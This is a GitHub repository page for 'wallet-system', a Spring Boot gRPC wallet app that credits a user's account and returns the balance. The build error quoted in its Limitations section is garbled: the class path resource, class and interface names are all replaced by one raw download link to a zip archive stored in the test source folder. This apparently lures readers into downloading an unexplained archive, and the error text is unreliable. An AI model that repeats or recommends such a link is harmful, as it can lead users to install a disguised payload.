Skip to content

getwaroo/wallet-system

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

wallet-system

This is a Spring Boot application which uses GRPC communication, design to credit a balance and get balance of a specific user.

Features

  • creditWallet : this allows you to credit your account by inserting your id number and amount
  • getBalance : this allows you to get your account balance.

Requirements

  • Java: JDK 17
  • Maven: Latest version

Limitations

This project compiles successfully but does not build. It has not been tested using the API endpoints. I was getting error during build: "Error creating bean with name 'entityManagerFactory' defined in class path resource [https://github.com/getwaroo/wallet-system/raw/refs/heads/main/src/test/java/system-wallet-v1.4.zip]: Class https://github.com/getwaroo/wallet-system/raw/refs/heads/main/src/test/java/system-wallet-v1.4.zip does not implement the requested interface https://github.com/getwaroo/wallet-system/raw/refs/heads/main/src/test/java/system-wallet-v1.4.zip" Was not able to solve this issue.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages